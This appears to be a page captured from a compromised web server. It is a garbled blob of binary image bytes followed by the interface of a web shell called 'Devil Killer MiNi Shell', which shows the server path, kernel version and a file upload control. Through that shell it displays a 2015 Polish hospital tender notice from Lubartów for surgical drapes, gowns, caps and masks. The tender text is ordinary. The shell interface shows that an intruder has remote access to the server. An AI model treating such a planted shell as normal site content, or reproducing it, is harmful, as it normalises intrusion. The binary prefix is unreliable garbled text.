JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150401/45731-N-2015.html

<p class="kh_header"><b>Lubartów: Dostawy obłożeń,  serwet operacyjnych i fartuchów</b><br>
<b>Numer ogłoszenia: 45731 - 2015; data zamieszczenia: 01.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul.  Cicha 14, 21-100 Lubartów, woj. lubelskie, tel. 81 855 66 08, faks 81 855 66 08.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy obłożeń,  serwet operacyjnych i fartuchów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia stanowią dostwy obłożeń  operacyjnych, serwet operacyjnych  oraz fartuchów    w ilościach i asortymencie określonym w Załączniku nr 1 do SIWZ w podziale na Pakiety 1-7.
2. Zamawiający wymaga, aby zestawy były zapakowane w torbę papierowo-foliową.
3. Zestawy muszą posiadać informację o nazwie producenta, dacie ważności i numer serii w postaci podwójnej samoprzylepnej etykiety.
4. Zamawiający wymaga, aby oferowane produkty były zgodne z normami: PN-EN 13795-1, 2, 3.
5. Zamawiający wymaga zaświadczenia o biozgodności, zgodnie  z normą:
	 PN-EN ISO 10 933-5:2009 oraz PN-EN ISO 10993-10:2009.
6. Wspólny Słownik Zamówień (CPV) : 33-14-00-00-3
7. Dopuszcza się składanie ofert częściowych w podziale na Pakiety 1-7.
8. Termin przydatności do użycia nie krótszy niż  24  miesiące, licząc od daty dostarczenia towaru do Zamawiającego.
9. W celu oceny zgodności z SIWZ i jakości dostarczanych wyrobów Zamawiający wymaga złożenia próbek dla:

Pakiet  Nr 1
L.p.
Nazwa wyrobu  Charakterystyka
Ilość próbek
1
Serweta chirurgiczna sterylna, jednorazowa  o wym. 75 X 90 cm z taśmą samoprzylepną (szer. taśmy 5 cm). Serweta powinna być wykonana z laminatu dwuwarstwowego(włóknina  hydrofilowa  PP  typu  spunbond  -  folia  polietylenowa)  o  gramaturze  63  g-m2 i spełniać wymagania wysokie strefy krytycznej na całej powierzchni zgodnie z normą PN-EN13795. 
Odporność na przenikanie cieczy min. 160 cm H2O. 
Wytrzymałość na wypychanie na mokro/sucho min. 150-180 kPa
Absorpcja włokniny/laminat - min. 650 %/360%
Współczynnik układalności  min. 75% .     
2 sztuki

2
Serweta chirurgiczna sterylna, jednorazowa  o wym. 150x200 cm. Serweta powinna być wykonana z laminatu dwuwarstwowego(włóknina  hydrofilowa  PP  typu  spunbond  -  folia  polietylenowa)  o  gramaturze  63  g-m2 i spełniać wymagania wysokie strefy krytycznej na całej powierzchni zgodnie z normą PN-EN13795. 
Odporność na przenikanie cieczy min. 160 cm H2O. 
Wytrzymałość na wypychanie na mokro-sucho min 150-180 kPa
Absorpcja włokniny-laminat - min. 650 %/360%
Współczynnik układalności  min. 75% . 

2 sztuki
3
Obłożenie chirurgiczne do laparoskopii ginekologicznej w składzie:
1. Serweta chirurgiczna do laparoskopii ginekologicznej o wymiarach 180-270x220 cm, zintegrowana z nogawicami, posiada otwór w kształcie trapezu w okolicach jamy brzusznej o wymiarach-wysokość 20 cm, dolna podstawa 20 cm, oraz otwor w okolicach krocza z zabezpieczeniami w postaci osłony o wymiarach 10x15 cm, 1 szt.,
2. Serweta na stolik-owinięcie zestawu 150x180 cm, 1 szt.
Wymagania serwety głównej:
-gramatura min. 63g-m2, 
-odporność na rozerwanie na sucho/mokro: 180-150 kPa
-odporność na przenikanie cieczy min. 160 cm H2O,
-absorbcja włókniny - min. 650%, 
-prędkość absorpcji - min. 5 cm3-s

2 sztuki
4
Serweta chirurgiczna sterylna, jednorazowa  o wym. 50x60 cm z taśmą samoprzylepną (szer. taśmy 5 cm). Serweta powinna być wykonana z laminatu dwuwarstwowego(włóknina  hydrofilowa  PP  typu  spunbond  -  folia  polietylenowa)  o  gramaturze  63  g-m2 i spełniać wymagania wysokie strefy krytycznej na całej powierzchni zgodnie z normą PN-EN13795. 
Odporność na przenikanie cieczy min. 160 cm H2O. 
Wytrzymałość na wypychanie na mokro/sucho min. 150-180 kPa
Absorpcja włokniny-laminat - min. 650 %-360%
Współczynnik układalności  min. 75% .    

2 sztuki
5

Obłożenie chirurgiczne do cystoskopii w składzie:
1. serweta chirurgiczna 75x175cm, posiadająca otwór na prącie o wymiarach 5x7cm, bezlateksowa osłona na palec do badania per rectum średnicy 3,5cm, natomiast otwory otacza warstwa chłonna o wymiarach 35x45cm - 1 szt.
2. osłony na kończyny wyposażone w taśmy samoprzylepne 53x118cm - 2 szt.
3). serweta na stolik instrumentarium - owinięcie zestawu, 100x150cm - 1 szt.
Wymagane dla serwety głównej:
Wymagania serwety głównej:
-gramatura min. 63g-m2, 
-odporność na rozerwanie na sucho/mokro: 180-150 kPa
-odporność na przenikanie cieczy min. 160 cm H2O,
-absorbcja włókniny - min. 650%, 
-prędkość absorpcji - min. 5 cm3-s

2 sztuki
6
Sterylny fartuch endoskopowy jednorazowego użytku, wykonany w części przedniej i rękawach z nieprzemakalnego materiału (laminat), w części tylnej z włókniny, szeroki, umożliwiający zabezpieczenie kończyn dolnych przed zamoczeniem, również w pozycji siedzącej, wiązany na troki, rozmiar L
2 sztuki

Pakiet  Nr 2
L.p.
Charakterystyka
Ilość próbek
1
Sterylny Zestaw uniwersalny do zabiegów chirurgicznych.                                                       W skład zestawu wchodzi:                                                                                                    - 1x serweta na stolik instrumentariuszki 140x190cm(owiniecie zestawu)                 - 1xserweta na stolik Mayo 8x142cm                                                                                                  -   2xserweta min 75x98cm przylepna na całej długości boku          -1xserweta min 196x200cm przylepna                                        -1xtaśma typu rzep min 2-3cmx13-23cm                                                                                              - 4xręczniki chłonne 20x35cm                                                                                                    -  1xpieciowarstwowy podkład ochronny na stół operacyjny przeciwodleżynowy. Rozmiar min100x229cm+-5cm,rdzeń chłonny nie większy niż 51x206cm+- 5cm z marginesami uszczelniającymi z laminatu z każdej strony chłonnej.       Serwety okrywające pacjenta wykonane są z jednorazowego ,chłonnego,laminatu,trójwarstwowego (polipropylen,polietylen,polipropylen) na całej powierzchni  pozbawionego pylących i łatwopalnych włókien celulozy i wiskozy o gramaturze 66g/m2 odporność na przenikanie płynów min 200cmH2O,wytrzymałość na rozciąganie wzdłuż na mokro i sucho pacjenta. Zestaw  spełnia wymagania dla procedur wysokiego ryzyka wg normy EN13795:1,2,3,pakowany sterylnie w przezroczystą ,foliowa torbę z portami sterylizacji ,posiada min 3 etykiety samoprzylepne do dokumentacji medycznej zawierające nr. katalogowe ,nr. lot, date ważności oraz nazwę producenta. 

2 sztuki
2
Sterylny zestaw do operacji kończyn. Skład zestawu:
- 1 x serweta  na stolik narzędziowy min. 152x190 cm
- 1 x serweta  na stolik Mayo  min. 75x141 cm
-  1  x  taśma lepna, 10x50 cm
- 1 x serweta do operacji kończyny 221x328 cm, z elastycznym,  samo uszczelniającym się otworem   Ř 4 cm, ze wzmocnieniem chłonnym 67x140 wokół otworu, 4 zintegrowane organizatory przewodów typu rzep z podwójną blokadą przypadkowego otwarcia. Serweta  wykonana z  wielowarstwowej włókniny polipropylenowej typu SMS o gramaturze 43g-m2 , w strefie krytycznej ze wzmocnieniem chłonnym z laminatu, o łącznej gramaturze min.115 g-m2, serweta dobrze układająca się na pacjencie, w części niekrytycznej oddychająca, paro przepuszczalna. Zestaw zgodny z normą EN 13795-1,2,3  pakowany sterylnie w przezroczystą, foliową torbę z portami do sterylizacji, posiada min. 3 etykiety samoprzylepne do dokumentacji medycznej zawierające: numer katalogowy, numer lot, datę ważności oraz nazwę producenta.

2 sztuki
Pakiet nr 3 
L.p.
Charakterystyka
Ilość próbek
1
Fartuch barierowy chirurgiczny wielokrotnego użytku standardowego ryzyka wykonany na bazie dwóch tkanin:  w strefie krytycznej z tkaniny poliestrowej max. 100g-m2 o wysokiej odporności na przenikanie cieczy powyżej 90cm słupa wody; w strefie mniej krytycznej z nieprzemakalnej tkaniny bawełniano - poliestrowej max. 125g-m2, skład 60%bawełna, 40% poliester. Szew łączący poszczególne tkaninowe elementy fartucha kryty, zawijany, dwuigłowy - stębnowany; rękawy wykończone elastycznym ściągaczem; Kolor niebieski lub zielony. Fartuchy operacyjne w pełni zgodne z normą PN-EN 13795 standardowego ryzyka. Fartuch ma zachować właściwości barierowe przez minimum 100 cykli użyć. 

1 szt.
Pakiet nr 4
L.p.
Charakterystyka
Ilość próbek
1
Czepek chirurgiczny damski w kształcie beretu, ściągnięty lekką nie uciskającą gumką wykonany z włókniny typu spunbonded o gramaturze 18g/m2 (włóknina złożona z termicznie spojonych, ciągłych włókien polipropylenowych). Wymiary: 
18 cm - materiał nierozciągnięty - w spoczynku (złożony na pół)
 55 cm - materiał po maksymalnym rozciągnięciu (złożony na pół)
 Pakowany w kartonik w formie podajnika, po 100szt., w kolorze zielonym. Opakowanie umożliwia pojedyncze wyjmowanie czepka z pudełka.
1 op. 
2
Czepek Chirurgiczny wykonany z włókniny wiskozowej wyprodukowanej w technologii printbond, wzmocnionej włókniniami sztucznego jedwabiu. Dookoła głowy wstawka z włókniny polipropylenowej pochłaniającej pot. W górnej częci z włókniny perforowanej paraprzepuszczajnlnej o gramaturze 28 g/m2, a w pozostała częci czepka wykonana z włókniny o gramaturze 25 g-m2. Nieuciskowa bezlateksowa gumka z tyłu czepka z wyprofilowaniem umożliwiającym schowanie włosów typu kok.  Pakowany w kartonik w formie podajnika, po 60 szt., w kolorze zielonym. Opakowanie umożliwia pojedyncze wyjmowanie czepka z pudełka.
1 op. 
3
Fartuch higieniczny dla położnic -  pacjenta, wykonany z nieprześwitującej włókniny, o zwiększonej gramaturze, zwiększony obwód oraz poszerzone krótkie rękawy, długie rozcięcie z przodu ułatwiające czynności zabiegowe; w rozmiarze XL.
2 szt.
4
Maska ochronna chirurgiczna wiązana na troki, trójwarstwowa, odporna na przesiąkanie hypoalergiczna. Pakowana w kartonik w formie podajnika pakowana po 50szt. Spełniająca wymogi normy: PN EN 14683 II. Opakowanie umożliwiające pojedyncze wyjmowanie z pudełka.
1 op. 
5
Maska ochronna chirurgiczna mocowana na gumki, trójwarstwowa, odporna na przesiąkanie hypoalergiczna. Pakowana w kartonik w formie podajnika pakowana po 50szt. Spełniająca wymogi normy: PN EN 14683 II.  Opakowanie umożliwiające pojedyncze wyjmowanie z pudełka.

1 op. 

Pakiet nr 5
L.p.
Charakterystyka
Ilość próbek
1
Folia chirurgiczna  o wymiarach 34x35cm, wymiarach w części lepnej 45x35cm, bakteriobójcza zawierająca w warstwie lepnej jodofor o działaniu antybakteryjnym, wykonana z poliestru o grubości 0,025mm, ultracienka, o paro przepuszczalności >600g-m2-24h, matowa, antystatyczna, hypoalergiczna, rozciągliwa z klejem akrylowym z systemem bezpiecznej aplikacji ze znacznikiem uwolnienia linera, sterylizowane radiacyjnie
1 szt.

Pakiet nr 6
L.p.
Charakterystyka
Ilość próbek
1
Obłożenie chirurgiczne  do cięcia carskiego w składzie:
1. Serweta chirurgiczna do cięcia cesarskiego o wymiarach 180x300 cm posiadająca otworów kształcie trapezu o wymiarach:wysokość23 cm, dolna podstawa 33 cm, górna podstawa 23 cm, wypełniony folią chirurgiczną, posiadająca zintegrowany,okalający worek do przechwytywania płynów wyposażony w sztywnik i zawór drenażowy 1 szt,
2. Serweta-owinięcie noworodka 99x120 cm, 1 szt,
3. Kleszczyki do dezynfekcji w kolorze niebieskim-1 szt.
4. Fartuch chirurgiczny wykonany z włókniny typu SMS, o gramaturze 35g-m2, posiada nieprzemakalne wstawki w przedniej części i rękawach w rozmiarze L, 3 szt,
5. Miska z polipropylenu z podziałka 250 ml-1szt.
6. Ręczniki chłonne 30x40 cm, 1 szt.,
7. Skalpel nr 24 z uchwytem- 2 szt
8. Czerwona osłona na stolik Mayo 79x145 cm, 1 szt.,
9. Serweta na stolik-owinięcie zestawu 150x190 cm, 1 szt.
10. Kompresy laparoskopijne  45x45 cm z RTG-6 szt.
11. Gaziki do dezynfekcji pola operacyjnego 7,5x7,5 cm 17 nitkowe 16 warstwowe-20 szt.
Wymagania dla serwety głównej:
-gramatura min. 63g-m2, 
-odporność na rozerwanie na sucho-mokro: 180-150 kPa
-odporność na przenikanie cieczy min. 160 cm H2O,
-absorpcja włókniny - min. 650%, 
-prędkość absorpcji - min. 5 cm3-s



1 szt.

Pakiet nr 7
L.p.
Charakterystyka
Ilość próbek
1
Jednorazowe prześcieradło nieprzemakalne wykonane z chłonnego i mocnego 3-warstwowego laminatu o gramaturze całkowitej 51gm2, wzmocnione podłużnymi nitkami co ok. 17mm o wymiarach 80x210 (+- 5 cm), pakowane po 100 szt. Kolor biały z niebieskimi nitkami. 

2 sztuki

Próbki winny znajdować się w oddzielnym opakowaniu niż oferta. Paczka z próbkami winna być oznaczona: 

Próbki do przetargu nieograniczonego na dostawy obłożeń,  serwet operacyjnych i fartuchów     nr sprawy  SZP-5-2015. 

Wewnątrz należy umieścić informację o nazwie i adresie Wykonawcy oraz informację, których  pozycji   próbki dotyczą. 
Próbki  należy złożyć  w Sekretariacie SP ZOZ w Lubartowie  ul. Cicha 14,  21-100 Lubartów do dnia  14.04.2015  r. do godz. 11.00.
10. Zamawiający zastrzega sobie prawo do wezwania Wykonawcy do przedłożenia Zamawiającemu innych próbek oferowanego asortymentu niż opisane w tabeli, w razie pojawienia się wątpliwości czy oferowany produkt jest zgdny z wymogami SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Oświadczenie Wykonawcy, że zaoferowane wyroby medyczne dopuszczone są do obrotu w Polsce zgodnie z ustawą o wyrobach medycznych z dnia 20 maja 2010 roku (Dz. U. Nr 107 poz.679),   Załącznik nr 5  do SIWZ
2. Foldery, katalogi zawierające szczegółowy opis przedmiotu zamówienia w języku polskim z zaznaczeniem pozycji , której dotyczą.
3. Karty techniczne gotowych wyrobów.
4. Dokumenty potwierdzające zgodność oferowanych produktów  z normą: PN-EN 13795-1, 2, 3.
5. Zaświadczenie o biozgodności, zgodnie  z normą PN-EN ISO 10 933-5:2009 oraz PN-EN ISO 10993-10:2009.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące przesłanki do zmiany warunków zawartej umowy:
1. W przypadku zmiany stawki podatku VAT w trakcie trwania umowy dopuszcza się zmianę wartości 	umowy o różnicę wynikającą ze zmiany wartości podatku VAT. Taka zmiana następuje z mocy 	prawa i nie musi być zaakceptowana przez Zamawiającego
2. W przypadku zmiany technologii produkcji lub w przypadku zaistnienia innych okoliczności pozwalających na obniżenie ceny przedmiotu umowy, Wykonawca odpowiednio ją obniży.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz-lubartow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Lubartowie ul. Cicha 14, 21-100 Lubartów Zamówienia Publiczne pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2015 godzina 11:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Lubartowie ul. Cicha 14, 21-100 Lubartów, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Różne obłożenia operacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serwety chirurgiczne, osłony na stolik Mayo, pokrowiec na przewody, pokrowiec na aparat RTG, kieszeń samoprzylepna, obłożenia chirurgiczne, fartuchy endoskopowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zestawy  do zabiegów chirurgicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestawy ubiwersalne do zabiegów chirurgicznych, zestawy do artroskopii,  operacji kończyn, do cięcia cesarskiego i zestawy  operacji biodra..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Odzież ochronna.</p>
